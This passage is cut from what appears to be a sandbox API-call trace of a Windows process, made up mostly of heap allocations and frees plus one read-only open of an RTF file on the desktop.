(HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0119.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0119.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0119.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0119.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0119.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0119.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0119.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0119.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0119.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0119.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0119.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0119.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0119.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0119.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0119.590] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0119.590] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0119.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0119.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0119.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0119.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0119.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0119.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0119.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0119.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0119.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0119.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0119.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0119.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0119.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0119.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0119.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0119.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0119.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0119.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0119.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0119.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2570 [0119.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0119.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0119.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0119.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0119.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0119.591] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0119.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0119.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0119.591] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0119.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0119.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7c0 [0119.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0119.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0119.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7c0 | out: hHeap=0x1780000) returned 1 [0119.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0119.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0119.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9b8 [0119.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0119.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0119.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0119.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0119.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0119.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0119.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0119.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0119.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0119.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0119.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0119.592] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca988 [0119.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0119.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0119.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0119.592] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0119.592] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0119.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0119.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0119.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0119.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca820 [0119.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43ca820, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0119.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0119.593] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0119.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0119.593] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0119.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0119.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0119.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0119.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0119.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0119.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0119.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0119.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0119.593] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0119.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0119.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0119.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0119.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0119.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0119.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0119.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0119.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa68 | out: hHeap=0x1780000) returned 1 [0119.594] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\5NSsZwi6b.rtf" (normalized: "c:\\users\\fd1hvy\\desktop\\5nsszwi6b.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0119.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0119.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea040 [0119.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0119.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0119.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0119.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0119.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0119.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0119.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0119.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0119.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0119.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca868 [0119.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0119.594] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2530 [0119.594] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0119.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a088 [0119.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0119.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa78 [0119.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0119.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0119.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0119.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0119.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0119.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0119.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7f0 [0119.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca958 [0119.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0119.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0119.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0119.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0119.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0119.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0119.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0119.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0119.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0119.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0119.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0119.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0119.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0119.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0119.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8e0 [0119.595] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0119.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0119.595] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0119.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0119.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca928 [0119.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0119.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca8c8 [0119.596] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0119.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0119.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0119.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0119.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0119.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0119.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0119.596] FreeLibrary (hLibModule=0x772d0000) returned 1 [0119.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0119.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0119.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0119.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0119.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0119.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0119.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0119.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf950 | out: hHeap=0x1780000) returned 1 [0119.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0119.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0119.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0119.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0119.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0119.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca760 | out: hHeap=0x1780000) returned 1 [0119.596] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca568 | out: hHeap=0x1780000) returned 1 [0119.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca610 | out: hHeap=0x1780000) returned 1 [0119.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0119.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0119.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0119.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0119.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0119.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0119.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0119.597] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca640 | out: hHeap=0x1780000) returned 1 [0119.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0119.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0119.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0119.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0119.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0119.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0119.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0119.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0119.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0119.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0119.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0119.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0119.599] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca940 | out: hHeap=0x1780000) returned 1 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a5250 | out: hHeap=0x1780000) returned 1 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0119.600] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9578 | out: hHeap=0x1780000) returned 1 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0119.600] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0119.600] PeekMessageW (in: lpMsg=0x144ebfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebfc) returned 0 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c80 | out: hHeap=0x1780000) returned 1 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d10 | out: hHeap=0x1780000) returned 1 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2150 | out: hHeap=0x1780000) returned 1 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb08 | out: hHeap=0x1780000) returned 1 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0119.600] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c68 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2130 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4c8 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c98 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392180 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb58 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cf8 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0119.601] HeapFree (in: hHeap=0x1780000, 